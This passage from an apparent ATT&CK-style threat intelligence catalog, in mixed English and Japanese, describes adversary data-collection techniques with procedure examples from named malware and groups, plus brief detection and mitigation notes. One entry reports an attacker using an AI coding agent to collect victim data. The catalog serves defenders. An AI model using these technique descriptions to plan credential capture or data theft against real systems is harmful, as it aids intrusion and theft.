.xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server. Koadic can download files off the target system to send back to the server. InvisiMole can collect data from the system, and can monitor changes in specified directories. QuasarRAT can retrieve files from compromised client machines. Kazuar uploads files from a specified directory to the C2 server. TrickBot collects local files and information from the victim’s local machine. Bisonal has collected information from a compromised host. Calisto can collect data from user directories. UPPERCUT can upload files to the C2 from infected machines. BadPatch collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx. Octopus can exfiltrate files from the system using a documents collector tool. OSX_OCEANLOTUS.D has the ability to upload files from a compromised host. KONNI has stored collected information and discovered processes in a tmp file. FlawedAmmyy has collected information and files from a compromised machine. njRAT can collect data from a local system. Ursnif has collected files from victim machines, including certificates and cookies. LightNeuron can collect files from a local system. esentutl can be used to collect data from local file systems. Machete searches the File system for files of interest. ZxShell can transfer files from a compromised host. ShimRat has the capability to upload collected files to a C2. Rising Sun has collected data and files from a compromised host. USBferry can collect information from an air-gapped host machine. Ramsay can collect Microsoft Word documents from the target's file system, as well as <code>.txt</code>, <code>.doc</code>, and <code>.xls</code> files from the Internet Explorer cache. SDBbot has the ability to access the file system on a compromised host. TajMahal has the ability to steal documents from the local system including the print spooler queue. Goopy has the ability to exfiltrate documents from infected systems. CookieMiner has retrieved iPhone text messages from iTunes phone backup files. Cryptoistic can retrieve files from the local file system. MCMD has the ability to upload files from an infected device. Drovorub can transfer files from the victim machine. FrameworkPOS can collect elements related to credit card data from process memory. FatDuke can copy files and directories from a compromised host. WellMess can send files from the victim machine to C2. WellMail can exfiltrate files from the victim machine. Pillowmint has collected credit card data using native API functions. BLINDINGCAN has uploaded files from victim machines. KGH_SPY can send a file containing victim system information to C2. SLOTHFULMEDIA has uploaded files and information from victim machines. Bazar can retrieve information from the infected machine. Crutch can exfiltrate files from compromised systems. SUNBURST collected information from a compromised host. BlackMould can copy files on a compromised host. Dtrack can collect a variety of information from victim machines. Caterpillar WebShell has a module to collect information from the local database. Out1 can copy files and Registry data from compromised hosts. P.A.S. Webshell has the ability to copy files on a compromised host. SideTwist has the ability to upload files from a compromised host. SombRAT has collected data and files from a compromised host. AppleSeed can collect data on a compromised host. RainyDay can use a file exfiltration tool to collect recently changed files on a compromised host. Nebulae has the capability to upload collected files to C2. GrimAgent can collect data and files from a compromised host. EnvyScout can collect sensitive NTLM material from a compromised host. BADFLICK has uploaded files from victims' machines. Wevtutil can be used to export events from a specific log. SpicyOmelette has collected data and other information from a compromised host. QakBot can use a variety of commands, including esentutl.exe to steal sensitive data from Internet Explorer and Microsoft Edge, to acquire information that is subsequently exfiltrated. BoxCaon can upload files from a compromised host. MarkiRAT can upload data from the victim's machine to the C2 server. xCaon has uploaded files from victims' machines. XCSSET collects contacts and application data from files in Desktop, Documents, Downloads, Dropbox, and WeChat folders. Clambling can collect information from a compromised host. FoggyWeb can retrieve configuration data from a compromised AD FS server. RCSession can collect data from a compromised host. SysUpdate can collect information and files from a compromised host. ThreatNeedle can collect data and files from a compromised host. Gelsemium can collect data from a compromised host. Chrommme can collect data from a local system. TinyTurla can upload files from a compromised host. WarzoneRAT can collect data from a compromised host. Tomiris has the ability to collect recent files matching a hardcoded list of extensions prior to exfiltration. Zox has the ability to upload files from a targeted system. DarkWatchman can collect files from a compromised host. CharmPower can collect data and files from a compromised host. QuietSieve can collect files from a compromised host. Cyclops Blink can upload files from a compromised host. Green Lambert can collect data from a compromised host. Neoichor can upload files from a victim's machine. DRATzarus can collect information from a compromised host. Flagpro can collect data from a compromised host, including Windows authentication information. PowerLess has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines. ZxxZ can collect data from a compromised host. DanBot can upload files from compromised hosts. Milan can upload files from a compromised host. MacMa can collect then exfiltrate files from the compromised system. OutSteel can collect information from a compromised host. Saint Bot can collect files and information from a compromised host. Shark can upload files to its C2. Kevin can upload logs and other data from a compromised host. DnsSystem can upload files from infected machines after receiving a command with `uploaddd` in the string. IceApple can collect files, passwords, and other data from a compromised host. CreepyDrive can upload files to C2 from victim machines. Amadey can collect information from a compromised host. Mongall has the ability to upload files from victim's machines. Action RAT can collect local data from an infected machine. AuTo Stealer can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine. PingPull can collect data from a compromised host. StrifeWater can collect data from a compromised host. STARWHALE can collect data from an infected local host. Bumblebee can capture and compress stolen credentials from the Registry and volume shadow copies. ccf32 can collect files from a compromised host. FunnyDream can upload files from victims' machines. PcShare can collect files and information from a compromised host. metaMain can collect files and system information from a compromised host. Mafalda can collect files and information from a compromised host. Brute Ratel C4 has the ability to upload files from a compromised system. SVCReady can collect data from an infected host. Woody RAT can collect information from a compromised host. KOPILUWAK can gather information from compromised hosts. Sardonic has the ability to collect data from a compromised machine to deliver to the attacker. SharpDisco has dropped a recent-files stealer plugin to `C:\Users\Public\WinSrcNT\It11.exe`. NightClub can use a file monitor to steal specific files from targeted systems. Samurai can leverage an exfiltration module to download arbitrary files from compromised machines. LoFiSe can collect files of interest from targeted systems. Pcexter can upload files from targeted systems. SLIGHTPULSE can read files specified on the local system. DarkGate has stolen `sitemanager.xml` and `recentservers.xml` from `%APPDATA%\FileZilla\` if present. RAPIDPULSE retrieves files from the victim system via encrypted commands sent to the web shell. NPPSPY records data entered from the local system logon at Winlogon to capture credentials in cleartext. IPsec Helper can identify specific files and folders for follow-on exfiltration. MgBot includes modules for collecting files from local systems based on a given set of properties and filenames. Raccoon Stealer collects data from victim machines based on configuration information received from command and control nodes. CHIMNEYSWEEP can collect files from compromised hosts. DUSTTRAP can gather data from infected systems. Latrodectus can collect data from a compromised host using a stealer module. Troll Stealer gathers information from infected systems such as SSH information from the victim's `.ssh` directory. Troll Stealer collects information from local FileZilla installations and Microsoft Sticky Note. StealBit can upload data and files to the LockBit victim-shaming site. CASTLETAP can execute a C2 command to transfer files from victim machines. Havoc can download files from the victim's computer. RedLine Stealer has collected data stored locally including chat logs and files associated with chat services such as Steam, Discord, and Telegram. InvisibleFerret has collected data utilizing a script that contained a list of excluded files and directory names and naming patterns of interest such as environment and configuration files, documents, spreadsheets, and other files that contained the words secret, wallet, private, and password. BeaverTail has exfiltrated data collected from local systems. TruffleHog has gathered data from home directories of the victim environment. GlassWorm has collected local data from a compromised host to include desktop cryptocurrency wallet data, and documents from within Desktop, Documents, and Downloads. BRICKSTORM has commands that allow the actor download files from the compromised host to the C2 server, and to also download specific sections of a file. LODEINFO can upload files from infected hosts to the C2. HiddenFace can upload files from the victim machine to C2 nodes. SPAWNCHIMERA has extracted the device’s Linux kernel image (vmlinux). LAMEHUG has the ability to collect system information and files of interest from compromised systems. 敵対者は、接続されたリムーバブルメディア上のデータを収集することがある。 Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. DLPでデータの不正な持ち出しを検出・防止する。 リムーバブルメディアからのデータに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 An APT28 backdoor may collect the entire contents of an inserted USB device. Turla RPC backdoors can collect files from USB thumb drives. A Gamaredon Group file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives. OilRig has used Wireshark’s usbcapcmd utility to capture USB traffic. FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by SPACESHIP. CosmicDuke steals user files from removable media with file extensions and keywords that match a predefined list. Rover searches for files on attached removable drives based on a predefined list of file extensions every five seconds. Prikormka contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB. Crimson contains a module to collect data from removable drives. Remsec has a package that collects documents from any inserted USB sticks. BADNEWS copies files with certain extensions from USB devices to a predefined directory. Once a removable media device is inserted back into the first victim, USBStealer collects data from it that was exfiltrated from a second victim. GravityRAT steals files based on an extension list if a USB drive is connected to the system. InvisiMole can collect jpeg files from connected MTP devices. Machete can find, encrypt, and upload files from fixed and removable drives. Aria-body has the ability to collect data from USB devices. Ramsay can collect data from removable media and stage it for exfiltration. TajMahal has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again. Crutch can monitor removable drives and exfiltrate files matching a given extension list. Explosive can scan all .exe files located in the USB drive. AppleSeed can find and collect data from removable media devices. ObliqueRAT has the ability to extract data from removable devices connected to the endpoint. The FunnyDream FilePakMonitor component has the ability to collect files from removable devices. MgBot includes modules capable of gathering information from USB thumb drives and CD-ROMs on the victim machine given a list of provided criteria. 敵対者は、ネットワーク共有ドライブ上のデータを収集することがある。 Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. ネットワーク共有ドライブからのデータに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0015, the threat actors collected files from network shared drives prior to network encryption. APT28 has collected files from network shared drives. menuPass has collected data from remote systems by mounting network shares with <code>net use</code> and using Robocopy to transfer data. Gamaredon Group malware has collected Microsoft Office documents from mapped network drives. Sowbug extracted Word documents from a file server on a victim network. BRONZE BUTLER has exfiltrated files stolen from file shares. Chimera has collected data of interest from network shares. Fox Kitten has searched network shares to access sensitive documents. RedCurl has collected data about network drives. CosmicDuke steals user files from network shared drives with file extensions and keywords that match a predefined list. When it first starts, BADNEWS crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt. Ramsay can collect data from network drives and stage it for exfiltration. Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel. 敵対者は、ユーザー入力（キー入力等）を取得して情報や認証情報を収集することがある。 Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture). 敵対者は、キー入力を記録して情報や認証情報を収集することがある。Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when OS Credential Dumping efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems. 敵対者は、偽の入力プロンプトを表示して情報を取得することがある。Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: Bypass User Account Control). 敵対者は、正規Webポータルに細工して入力情報を取得することがある。Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. 敵対者は、APIをフックして入力情報を取得することがある。Adversaries may hook into Windows application programming interface (API) functions and Linux system functions to collect user credentials. Malicious hooking mechanisms may capture API or function calls that include parameters that reveal user authentication credentials. Unlike Keylogging, this technique focuses specifically on API functions that include parameters that reveal user credentials. 入力キャプチャに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Versa Director Zero Day Exploitation intercepted and harvested credentials from user logins to compromised devices. Leviathan captured submitted multfactor authentication codes and other technical artifacts related to remote access sessions during Leviathan Australian Intrusions. APT39 has utilized tools to capture mouse movements. APT42 has used credential harvesting websites. Storm-1811 has used a PowerShell script to capture user credentials after prompting a user to authenticate to run a malicious script masquerading as a legitimate update item. FlawedAmmyy can collect mouse events. Chaes has a module to perform any API hooking it desires. Kobalos has used a compromised SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host. metaMain can log mouse events. Mafalda can conduct mouse event logging. NPPSPY captures user input into the Winlogon process by redirecting RPC traffic from legitimate listening DLLs within the operating system to a newly registered malicious item that allows for recording logon information in cleartext. InvisibleFerret has collected mouse and keyboard events using “pyWinhook”. 敵対者は、持ち出し前にデータを1か所に集約（ステージング）することがある。 Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location. 敵対者は、ローカルシステム上にデータを集約することがある。Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location. 敵対者は、リモートシステム上にデータを集約することがある。Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location. データのステージングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Wizard Spider has collected and staged credentials and network enumeration information, using the networkdll and psfin TrickBot modules. Scattered Spider stages data in a centralized database prior to exfiltration. Volt Typhoon has staged collected data in password-protected archives. INC Ransom has staged data on compromised hosts prior to exfiltration. VOID MANTICORE has staged compressed files in specified locations prior to exfiltration over C2. Kobalos can write captured SSH connection credentials to a file under the <code>/var/run</code> directory with a <code>.pid</code> extension for exfiltration. Shark has stored information in folders named `U1` and `U2` prior to exfiltration. Kevin can create directories to store logs and other collected data. QUIETCANARY has the ability to stage data prior to exfiltration. 敵対者は、デスクトップのスクリーンショットを取得して情報を収集することがある。 Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>. 画面キャプチャに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2025 Poland Wiper Attacks, the adversaries captured screenshots of devices using <code>nircmd</code> console through the command <code>nircmd.exe “savescreenshot C:\Windows\Temp\imagetmp.png</code>. APT28 has used tools to take screenshots from victims. Dragonfly has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil). Malware used by Group5 is capable of watching the victim's screen. FIN7 captured screenshots and desktop video recordings. Gamaredon Group's malware can take screenshots of the compromised computer every minute. OilRig has a tool called CANDYKING to capture a screenshot of user's desktop. Magic Hound malware can take a screenshot and upload the file to its C2 server. BRONZE BUTLER has used a tool to capture screenshots. MuddyWater has used malware that can capture screenshots of the victim’s machine. Dark Caracal took screenshots using their Windows malware. APT39 has used a screen capture utility to take screenshots on a compromised host. Silence can capture victim screen activity. Kimsuky has captured browser screenshots using TRANSLATEXT. Kimsuky has also obtained screen captures with custom malware. GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines. Volt Typhoon has obtained a screenshot of the victim's system using the gdi32.dll and gdiplus.dll libraries. MoustachedBouncer has used plugins to take screenshots on targeted systems. Winter Vivern delivered PowerShell scripts capable of taking screenshots of victim machines. APT42 has used malware, such as GHAMBAR and POWERPOST, to take screenshots. VOID MANTICORE has captured screen content during an active Zoom session. TinyZBot contains screen capture functionality. PlugX allows the operator to capture screenshots. BISCUIT has a command to periodically take screenshots of the system. Derusbi is capable of performing screen captures. CHOPSTICK has the capability to capture screenshots. Carbanak performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server. gh0st RAT can capture the victim’s screen remotely. A JHUHUGIT variant takes screenshots by simulating the user pressing the "Take Screenshot" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image. CosmicDuke takes periodic screenshots and exfiltrates them. DustySky captures PNG screenshots of the main screen. ZLib has the ability to obtain screenshots of the compromised system. Kasidet has the ability to initiate keylogging and screen captures. BlackEnergy is capable of taking screenshots. Rover takes screenshots of the compromised system's desktop and saves them to <code>C:\system\screenshot.bmp</code> for exfiltration every 60 minutes. Trojan.Karagany can take a desktop screenshot and save the file into <code>\ProgramData\Mail\MailAg\shot.png</code>. T9000 can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files. Prikormka contains a module that captures screenshots of the victim's desktop. Crimson contains a command to perform screen captures. BADNEWS has a command to take a screenshot and send it to the C2 server. Flame can take regular screenshots when certain applications are open that are sent to the command and control server. Pteranodon can capture screenshots at a configurable interval. RTM can capture screenshots. HALFBAKED can obtain screenshots from the victim. EvilGrab has the capability to capture screenshots. RedLeaves can capture screenshots. Cobalt Strike's Beacon payload is capable of capturing screenshots. XAgentOSX contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods. Janicab captured screenshots and sent them out to a C2 server. Matryoshka is capable of performing screen captures. FinFisher takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process. POWRUNER can capture a screenshot from a victim. Daserf can take screenshots. Pupy can drop a mouse-logger that will take small screenshots around at each click and then send back to the server. PowerSploit's <code>Get-TimedScreenshot</code> Exfiltration module can take screenshots at regular intervals. NETWIRE can capture the victim's screen. TURNEDUP is capable of taking screenshots. Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host. DOGCALL is capable of capturing screenshots of the victim's machine. POORAIM can perform screen capturing. SHUTTERSPEED can capture screenshots. POWERSTATS can retrieve screenshots from compromised hosts. Bandook is capable of taking an image of and uploading the current desktop. CrossRAT is capable of taking screen captures. ROKRAT can capture screenshots of the infected system using the `gdi32` library. yty collects screenshots of the victim machine. A variant of Zebrocy captures screenshots of the victim’s machine in JPEG and BMP format. VERMIN can perform screen captures of the victim’s machine. InvisiMole can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping. Catchamas captures screenshots based on specific keywords in the window’s title. Kazuar captures screenshots of the victim’s screen. RogueRobin has a command named <code>$screenshot</code> that may be responsible for taking screenshots of the victim machine. KEYMARBLE can capture screenshots of the victim’s machine. Socksbot can take screenshots. UPPERCUT can capture desktop screenshots in the PNG format and send them to the C2 server. FruitFly takes screenshots of the user's desktop. Proton captures the content of the desktop with the screencapture binary. MacSpy can capture screenshots of the desktop over multiple monitors. jRAT has the capability to take screenshots of the victim’s machine. Zeus Panda can take screenshots of the victim’s machine. Agent Tesla can capture screenshots of the victim’s desktop. Remcos takes automated screenshots of the infected machine. BadPatch captures screenshots in .jpg format and then exfiltrates them. Cobian RAT has a feature to perform screen capture. Micropsia takes screenshots every 90 seconds by calling the Gdi32.BitBlt API. Octopus can capture screenshots of the victims’ machine. Azorult can capture screenshots of the victim’s machines. Cardinal RAT can capture screenshots. Cannon can take a screenshot of the desktop. KONNI can take screenshots of the victim’s machine. Empire is capable of capturing screenshots on Windows and macOS systems. Remexi takes screenshots of windows of interest. Revenge RAT has a plugin for screen capture. StoneDrill can take screenshots. FlawedAmmyy can capture screenshots. njRAT can capture screenshots of the victim’s machines. Ursnif has used hooked APIs to take screenshots. KeyBoy has a command to perform screen grabbing. HyperBro has the ability to take screenshots. Machete captures screenshots. ZxShell can capture screenshots. GRIFFON has used a screenshot module that can be used to take a screenshot of the remote system. PoetRAT has the ability to take screen captures. HotCroissant has the ability to do real time screen viewing on an infected host. Kivars has the ability to capture screenshots on the infected host. Attor's has a plugin that captures screenshots of the target applications. Cadelspy has the ability to capture screenshots and webcam photos. Metamorfo can collect screenshots of the victim’s machine. Aria-body has the ability to capture screenshots on compromised hosts. Ramsay can take screenshots every 30 seconds as well as when an external removable storage device is connected. TajMahal has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications. Valak has the ability to take screenshots on a compromised host. Carberp can capture display screenshots with the screens_dll.dll plugin. RDAT can take a screenshot on the infected system. SLOTHFULMEDIA has taken a screenshot of a victim's desktop, named it "Filter3.jpg", and stored it in the local directory. SharpStage has the ability to capture the victim's screen. LookBack can take desktop screenshots. ConnectWise can take screenshots on remote hosts. RemoteUtilities can take screenshots on a compromised host. ECCENTRICBANDWAGON can capture screenshots and store them locally. AppleSeed can take screenshots on a compromised host by calling a series of APIs. RainyDay has the ability to capture screenshots. Chaes can capture screenshots of the infected machine. Sliver can take screenshots of the victim’s active display. Peppy can take screenshots on targeted systems. ObliqueRAT can capture a screenshot of the current screen. Turian has the ability to take screenshots. SMOKEDHAM can capture screenshots of the victim’s desktop. MarkiRAT can capture screenshots that are initially saved as ‘scr.jpg’. BLUELIGHT has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter. XCSSET saves a screen capture of the victim's system with a numbered filename and <code>.jpg</code> extension. Screen captures are taken at specified intervals based on the system. Clambling has the ability to capture screenshots. RCSession can capture screenshots from a compromised host. SysUpdate has the ability to capture screenshots. Chrommme has the ability to capture screenshots. CharmPower has the ability to capture screenshots. LitePower can take system screenshots and save them to `%AppData%`. Lizar can take JPEG screenshots of an infected system. Lizar has also used a plugin to take a screenshot of the infected system. QuietSieve has taken screenshots every five minutes and saved them to the user's local Application Data folder under `Temp\SymbolSourceSymbols\icons` or `Temp\ModeAuto\icons`. SILENTTRINITY can take a screenshot of the current desktop. MacMa has used Apple’s Core Graphic APIs, such as `CGWindowListCreateImageFromArray`, to capture the user's screen and open windows. StrifeWater has the ability to take screen captures. The FunnyDream ScreenCap component can take screenshots on a compromised host. PcShare can take screen shots of a compromised machine. metaMain can take and save screenshots. Mafalda can take a screenshot of the target machine and save it to a file. Brute Ratel C4 can take screenshots on compromised hosts. SVCReady can take a screenshot from an infected host. Woody RAT has the ability to take a screenshot of the infected host desktop using Windows GDI+. BADHATCH can take screenshots and send them to an actor-controlled C2 server. AsyncRAT has the ability to view the screen on compromised hosts. NightClub can load a module to call `CreateCompatibleDC` and `GdipSaveImageToStream` for screen capture. NKAbuse can take screenshots of the victim machine. Mispadu has the ability to capture screenshots on compromised hosts. LunarMail can capture screenshots from compromised hosts. Raccoon Stealer can capture screenshots from victim systems. CHIMNEYSWEEP can capture screenshots on targeted systems using a timer and either upload them or store them to disk. Cuckoo Stealer can run `screencapture` to collect screenshots from compromised hosts. Manjusaka can take screenshots of the victim desktop. DUSTTRAP can capture screenshots. LightSpy uses Apple's built-in AVFoundation Framework library to access the user's camera and screen. It uses the `AVCaptureStillImage` to take a picture using the user's camera and the `AVCaptureScreen` to take a screenshot or record the user's screen for a specified period of time. Troll Stealer can capture screenshots from victim machines. TRANSLATEXT has the ability to capture screenshots of new browser tabs, based on the presence of the `Capture` flag. XLoader can capture screenshots on compromised hosts. Quick Assist allows for the remote administrator to take screenshots of the running system. Lumma Stealer has taken screenshots of victim machines. Havoc can capture screenshots. TONESHELL has conducted screen capturing. RedLine Stealer can capture screenshots on a compromised host. HTTPTroy has obtained screen captures leveraging the `screen` command which captures, encrypts and uploads the stolen image to the adversary controlled C2 server. LODEINFO has the ability to take screenshots. The AshTag AshenOrchestrator component has the ability to take screenshots. 敵対者は、ユーザーのメールから機密情報を収集することがある。 Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Emails may also contain details of ongoing incident response operations, which may allow adversaries to adjust their techniques in order to maintain persistence or evade defenses. Adversaries can collect or forward email from mail servers or clients. 敵対者は、ローカルのメールデータを収集することがある。Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. 敵対者は、メールサーバからリモートでメールを収集することがある。Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as MailSniper can be used to automate searches for specific keywords. 敵対者は、メール転送ルールを設定して継続的にメールを収集することがある。Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations. Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators. Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes. 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 機微情報を暗号化し、窃取時の影響を軽減する。 システムやアカウントを監査し、不正な活動を検出する。 帯域外の通信チャネルを確保し、主系の侵害時にも対応できるようにする。 メール収集に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Magic Hound has compromised email credentials in order to steal sensitive data. Silent Librarian has exfiltrated entire mailboxes from compromised accounts. Ember Bear attempts to collect mail from accessed systems and servers. Scattered Spider searched the victim’s Microsoft Exchange for emails about the intrusion and incident response. Emotet has been observed leveraging a module that can scrape email addresses from Outlook. TRANSLATEXT has exfiltrated collected email addresses to the C2 server. 敵対者は、クリップボードの内容を取得して情報を収集することがある。 Adversaries may collect data stored in the clipboard from users copying information within or between applications. クリップボードデータに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Wocao, threat actors collected clipboard data in plaintext. OilRig has used infostealer tools to copy clipboard data. APT38 used a Trojan called KEYLIME to collect data from the clipboard. APT39 has used tools capable of stealing contents of the clipboard. Kimsuky has the ability to steal data from the clipboard. TinyZBot contains functionality to collect information from the clipboard. A JHUHUGIT variant accesses a screenshot saved in the clipboard and converts it to a JPG image. CosmicDuke copies and exfiltrates the clipboard contents every 30 seconds. RTM collects data from the clipboard. The executable version of Helminth has a module to log clipboard contents. ROKRAT can extract clipboard data from a compromised host. Koadic can retrieve the current content of the user clipboard. RunningRAT contains code to open and copy data from the clipboard. VERMIN collects data stored in the clipboard. Catchamas steals data stored in the clipboard. MacSpy can steal clipboard contents. jRAT can capture clipboard data. Zeus Panda can hook GetClipboardData function to watch for clipboard pastes to collect. Agent Tesla can steal data from the victim’s clipboard. Remcos steals and modifies data from the clipboard. DarkComet can steal data from the clipboard. KONNI had a feature to steal data from the clipboard. Empire can harvest clipboard data on both Windows and macOS systems. Astaroth collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries. Remexi collects text from the clipboard. FlawedAmmyy can collect clipboard data. Machete hijacks the clipboard data by creating an overlapped window that listens to keyboard events. Attor has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs. Cadelspy has the ability to steal data from the clipboard. Metamorfo has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's. TajMahal has the ability to steal data from the clipboard of an infected host. Melcoz can monitor content saved to the clipboard. Grandoreiro can capture clipboard data from a compromised host. Explosive has a function to use the OpenClipboard wrapper. MarkiRAT can capture clipboard content. Clambling has the ability to capture and store clipboard data. SILENTTRINITY can monitor Clipboard text and can use `System.Windows.Forms.Clipboard.GetText()` to collect data from the clipboard. DarkTortilla can download a clipboard information stealer module. DarkGate starts a thread on execution that captures clipboard data and logs it to a predefined log file. Mispadu has the ability to capture and replace Bitcoin wallet data in the clipboard on a compromised host. MgBot can capture clipboard data. CHIMNEYSWEEP can capture content from the clipboard. XLoader can collect data stored in the victim's clipboard. BOOKWORM has used its KBLogger.dll module to steal data saved to the clipboard. PAKLOG has monitored and extracted clipboard contents. InvisibleFerret has stolen data from the clipboard using the Python project “pyperclip”. InvisibleFerret has also captured clipboard contents during copy and paste operations. 敵対者は、スクリプト等を用いてデータ収集を自動化することがある。 Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. 重要データをリモートに保管し、破壊・改ざんの影響を軽減する。 機微情報を暗号化し、窃取時の影響を軽減する。 自動収集に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information. During Operation Wocao, threat actors used a script to collect information about the infected system. APT41 DUST used tools such as SQLULDR2 and PINEGROVE to gather local system and database information. ArcaneDoor included collection of packet capture and system configuration information. During SharePoint ToolShell Exploitation, threat actors used a command shell to automatically iterate through web.config files to expose and collect machineKey settings. During the Anthropic AI-orchestrated Campaign, the adversary used Claude Code to automatically collect and process large volumes of data from without human direction. Ke3chang has performed frequent and scheduled data collection from victim networks. APT1 used a batch script to perform a series of discovery techniques and saves it to a text file. APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks. Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories. FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button. Patchwork developed a file stealer to search C:\ and collect files with certain extensions. Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server. menuPass has used the Csvde tool to collect Active Directory files and data. Gamaredon Group has deployed scripts on compromised systems that automatically scan for interesting documents. OilRig has used automated collection. FIN5 scans processes on all victim systems in the environment and uses automated scripts to pull back the results. Tropic Trooper has collected information automatically using the adversary's USBferry attack. Chimera has used custom DLLs for continuous retrieval of data from memory. Sidewinder has used tools to automatically collect system and network configuration information. HAFNIUM has used MSGraph to exfiltrate 